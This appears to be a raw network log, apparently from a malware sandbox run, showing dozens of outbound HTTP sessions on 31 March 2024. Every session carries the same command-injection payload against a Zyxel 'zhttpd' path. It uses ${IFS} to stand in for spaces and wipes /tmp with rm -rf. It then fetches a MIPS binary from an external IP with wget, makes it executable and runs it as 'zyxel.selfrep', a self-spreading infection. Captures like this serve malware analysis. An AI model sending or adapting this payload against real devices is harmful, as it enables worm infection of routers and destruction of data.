                              Mar 31, 2024 08:41:12.624880075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1940192.168.2.1353644164.29.126.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624917984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1941192.168.2.1333500184.79.161.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624964952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1942192.168.2.134296689.4.128.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.624994040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1943192.168.2.1336412104.166.202.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625055075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1944192.168.2.1338990201.12.221.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625093937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1945192.168.2.133941688.151.97.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625138998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1946192.168.2.135023062.47.168.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625169039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1947192.168.2.134201089.220.145.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625200987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1948192.168.2.1337846153.245.1.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625267982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1949192.168.2.1349366135.100.80.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625281096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1950192.168.2.1335740107.230.149.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625304937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1951192.168.2.135326239.229.159.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625363111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1952192.168.2.1349080108.133.155.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625401020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1953192.168.2.135043275.64.246.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625417948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1954192.168.2.134005891.163.85.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625458002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1955192.168.2.1356928110.2.51.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625499964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1956192.168.2.135736474.252.232.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625533104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1957192.168.2.13397922.61.132.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625587940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1958192.168.2.134753425.117.253.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625626087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1959192.168.2.1339994146.241.173.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625684977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1960192.168.2.1348690115.80.252.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625689030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1961192.168.2.135398861.216.255.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625736952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1962192.168.2.1339250201.181.96.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625782013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1963192.168.2.135233065.204.151.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625817060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1964192.168.2.1338836162.183.101.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625849009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1965192.168.2.1336346118.99.135.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625871897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1966192.168.2.1350108198.14.102.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625931978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1967192.168.2.134813217.102.130.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.625972033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1968192.168.2.134570813.229.80.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626004934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1969192.168.2.1340596155.31.81.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626036882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1970192.168.2.135757649.117.192.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626069069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1971192.168.2.1357400205.59.131.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626112938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1972192.168.2.135663244.44.143.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626152992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1973192.168.2.134098049.120.151.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626210928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1974192.168.2.1356256137.41.209.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626266003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1975192.168.2.1337512137.65.152.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626286030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1976192.168.2.1344398139.59.58.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626319885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1977192.168.2.135223044.6.184.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626368999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1978192.168.2.135635013.206.159.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626369953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1979192.168.2.1346502217.205.32.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626409054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1980192.168.2.1335994218.36.172.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626456976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1981192.168.2.134985039.244.167.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626507998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1982192.168.2.1333138185.20.98.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626543999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1983192.168.2.1359500170.241.35.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626564980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1984192.168.2.135428625.183.192.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626631975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1985192.168.2.1348054191.101.125.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626682997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1986192.168.2.135965260.112.135.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626729012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1987192.168.2.135861895.27.152.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626763105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1988192.168.2.134272875.5.136.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626796961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1989192.168.2.135503048.7.254.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626851082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1990192.168.2.134876467.67.118.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626862049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1991192.168.2.1333182143.89.15.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626894951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1992192.168.2.1360188163.89.238.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626951933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1993192.168.2.1341230174.193.94.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.626980066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1994192.168.2.1340826209.250.243.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627037048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1995192.168.2.1358326103.124.2.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627091885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1996192.168.2.135050464.55.156.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627115011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1997192.168.2.1335518157.203.98.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627168894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1998192.168.2.1358258189.244.247.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627221107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1999192.168.2.1338652168.30.98.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627269030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2000192.168.2.1344536185.189.197.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627300978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2001192.168.2.133554420.139.162.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627342939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2002192.168.2.1353424209.123.210.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627386093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2003192.168.2.1350616167.155.219.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627422094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2004192.168.2.1354606110.192.241.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627475977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2005192.168.2.1347810145.224.44.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627523899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2006192.168.2.1357208168.90.231.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627547026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2007192.168.2.1352208196.39.68.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627599955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2008192.168.2.1339166144.156.183.254443
                              TimestampBytes transferredDirectionData
